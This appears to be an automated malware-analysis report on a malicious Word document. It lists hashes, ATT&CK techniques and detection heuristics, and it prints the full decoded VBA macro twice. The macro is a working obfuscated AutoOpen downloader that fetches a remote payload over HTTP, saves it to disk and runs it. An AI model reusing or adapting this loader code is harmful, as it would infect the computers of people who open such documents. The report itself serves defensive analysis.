Office (OLE) malware analysis — malicious · 6d5253398f7c3b18

MALICIOUS

Office (OLE)

34.0 KB Created: 2015-01-19 10:22:00 Authoring application: Microsoft Office Word First seen: 2015-02-17

MD5: c7fb34847ea945984d6d690c4b051b17 SHA-1: cdbcc78f8c63af80fc4b5552029702f1a52ba78e SHA-256: 6d5253398f7c3b18c749e2880a4574ddcc785aebf01eb6d3b33b83c18da45c7c

316 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a critical heuristic indicating a VBA macro that downloads and executes a file from an HTTP URL. The VBA script explicitly uses CreateObject to instantiate an object for downloading and saving a file, and attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The script also attempts to download a payload from the reconstructed URL the embedded link

Heuristics 9

ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    If lqj4OnON(fdgert3r, .responseBody) = False Then
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
 Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
 Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3454 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3454 bytes
SHA-256: `afc705c92c6c04d48e0cca9d44975d92edb565db6d5a0a2e27f395c23947bc71`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Const tocFp6Ci = "RHmhiglW" Private Const lu0ADI = "“Њј¬«•їЛєТЙЦ" Private Const FXC0O = "FcXBDjpJ" Private Const OfmF = "ґТ…ҐҐНШЇЏЕ··ЮђёИОЈ°УФ§ЧЅ" Private Const iD2E0Ifr = "isuHYmuy" Private Const YaoZ6ISB = "МФШ°ѕљШибйєИЩ" Private Const vymArH = "DVuVgasc" Private Const wPWCLsRmA = "‹›Й" Private Const V8aAdPb = "IIirEgAf" Private Const TYRE = "–ІМдґЪ°МЅ—К’і‰ќќ№" Private Const SORyht2aNVn = "WqTYmiRe" Private Const Z5AlucBiW = "іХЗїаНё“ЦМѕ" Private Const HFfeUiZo = "bdVuKCmU" Private Const gvFktaB = "¶©ЈЕ" Private Const seq = "fDJRuIHX" Private Const EVsZjgGped = "№¬Їѕбw‰Иґ¶»ШЄјПіё" Private Const dgL8Y5 = "jpwmSbca" Private Const iRqo = "ЖФкУЖЖЙЏХпТ" Private Const Oat7OoU5O = "oclJEhjQ" Private Const CDQluD = "ГЁ№љ" Private Const GuXH1 = "jkinLRYD" Private Const h3OXMLBCsI = "ТЯЭЮ†Ѓ€©МЭУВБЕаР—С»ї€ФЮ�РµА‡ПгО" Sub s5AHNe() PtBTpJ End Sub Sub WGRW() s5AHNe End Sub Sub autoopen() s5AHNe End Sub Public Sub PtBTpJ() On Error GoTo errHere Dim hk5tg As String Dim ghjrtg As String Dim ktyreg As String ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1) ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5) If PfnG(ghjrtg, ktyreg) = False Then GoTo ExitHere End If Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq)) yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn) ExitHere: Exit Sub errHere: Resume ExitHere End Sub Public Function PfnG(strTarget As String, fdgert3r As String, Optional strUN As String, Optional strPW As String) As Boolean On Error GoTo errHere Dim dsfrt34t43g As Object Dim yukjh4 As String PfnG = True Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb)) With dsfrt34t43g .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW .setRequestHeader PwlVK1OLyI(YaoZ6ISB, iD2E0Ifr), PwlVK1OLyI(OfmF, FXC0O) .Send If lqj4OnON(fdgert3r, .responseBody) = False Then GoTo errHere End If End With ExitHere: Set dsfrt34t43g = Nothing Exit Function errHere: PfnG = False Resume ExitHere End Function Private Function lqj4OnON(strFilePath, bytArray) As Boolean On Error GoTo errHere Dim objStream As Object lqj4OnON = True Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci)) With objStream .Type = 1 .Open .Write bytArray .SaveToFile strFilePath, 2 End With ExitHere: Exit Function errHere: lqj4OnON = False Resume ExitHere End Function Public Function PwlVK1OLyI(ByVal strData As String, ByVal strKey As String) Dim bData() As Byte Dim bKey() As Byte bData = StrConv(strData, vbFromUnicode) bKey = StrConv(strKey, vbFromUnicode) For i = 0 To UBound(bData) If i <= UBound(bKey) Then bData(i) = bData(i) - bKey(i) Else bData(i) = bData(i) - bKey(i Mod UBound(bKey)) End If Next i PwlVK1OLyI = StrConv(bData, vbUnicode) End Function

SHA-256: afc705c92c6c04d48e0cca9d44975d92edb565db6d5a0a2e27f395c23947bc71

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const tocFp6Ci = "RHmhiglW"
Private Const lu0ADI = "“Њј¬«•їЛєТЙЦ"
Private Const FXC0O = "FcXBDjpJ"
Private Const OfmF = "ґТ…ҐҐНШЇЏЕ··ЮђёИОЈ°УФ§ЧЅ"
Private Const iD2E0Ifr = "isuHYmuy"
Private Const YaoZ6ISB = "МФШ°ѕљШибйєИЩ"
Private Const vymArH = "DVuVgasc"
Private Const wPWCLsRmA = "‹›Й"
Private Const V8aAdPb = "IIirEgAf"
Private Const TYRE = "–ІМдґЪ°МЅ—К’і‰ќќ№"
Private Const SORyht2aNVn = "WqTYmiRe"
Private Const Z5AlucBiW = "іХЗїаНё“ЦМѕ"
Private Const HFfeUiZo = "bdVuKCmU"
Private Const gvFktaB = "¶©ЈЕ"
Private Const seq = "fDJRuIHX"
Private Const EVsZjgGped = "№¬Їѕбw‰Иґ¶»ШЄјПіё"
Private Const dgL8Y5 = "jpwmSbca"
Private Const iRqo = "ЖФкУЖЖЙЏХпТ"
Private Const Oat7OoU5O = "oclJEhjQ"
Private Const CDQluD = "ГЁ№љ"
Private Const GuXH1 = "jkinLRYD"
Private Const h3OXMLBCsI = "ТЯЭЮ†Ѓ€©МЭУВБЕаР—С»ї€ФЮ�РµА‡ПгО"

Sub s5AHNe()
 PtBTpJ
End Sub
Sub WGRW()
     s5AHNe
End Sub
Sub autoopen()
     s5AHNe
End Sub
Public Sub PtBTpJ()
On Error GoTo errHere
 
Dim hk5tg As String
 
Dim ghjrtg As String
Dim ktyreg As String
 
ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1)
ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
 
If PfnG(ghjrtg, ktyreg) = False Then

    GoTo ExitHere
End If
 Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn)
 
ExitHere:
    Exit Sub
errHere:

    Resume ExitHere

End Sub
 
Public Function PfnG(strTarget As String, fdgert3r As String, Optional strUN As String, Optional strPW As String) As Boolean
On Error GoTo errHere
 
Dim dsfrt34t43g As Object
Dim yukjh4 As String
 PfnG = True
Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb))
With dsfrt34t43g
    .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW
    .setRequestHeader PwlVK1OLyI(YaoZ6ISB, iD2E0Ifr), PwlVK1OLyI(OfmF, FXC0O)
    .Send
    If lqj4OnON(fdgert3r, .responseBody) = False Then
        GoTo errHere
    End If
End With
 
ExitHere:
    Set dsfrt34t43g = Nothing
    Exit Function
 
errHere:
     PfnG = False
    Resume ExitHere
    
End Function
 
Private Function lqj4OnON(strFilePath, bytArray) As Boolean
On Error GoTo errHere
 
 
Dim objStream  As Object
 lqj4OnON = True
Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci))
With objStream
    .Type = 1
    .Open
    .Write bytArray
    .SaveToFile strFilePath, 2
End With
 
ExitHere:
    Exit Function
errHere:
     lqj4OnON = False
    Resume ExitHere

End Function



Public Function PwlVK1OLyI(ByVal strData As String, ByVal strKey As String)

Dim bData() As Byte
Dim bKey() As Byte
bData = StrConv(strData, vbFromUnicode)
bKey = StrConv(strKey, vbFromUnicode)
For i = 0 To UBound(bData)
If i <= UBound(bKey) Then
bData(i) = bData(i) - bKey(i)
Else
bData(i) = bData(i) - bKey(i Mod UBound(bKey))
End If
Next i
 PwlVK1OLyI = StrConv(bData, vbUnicode)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.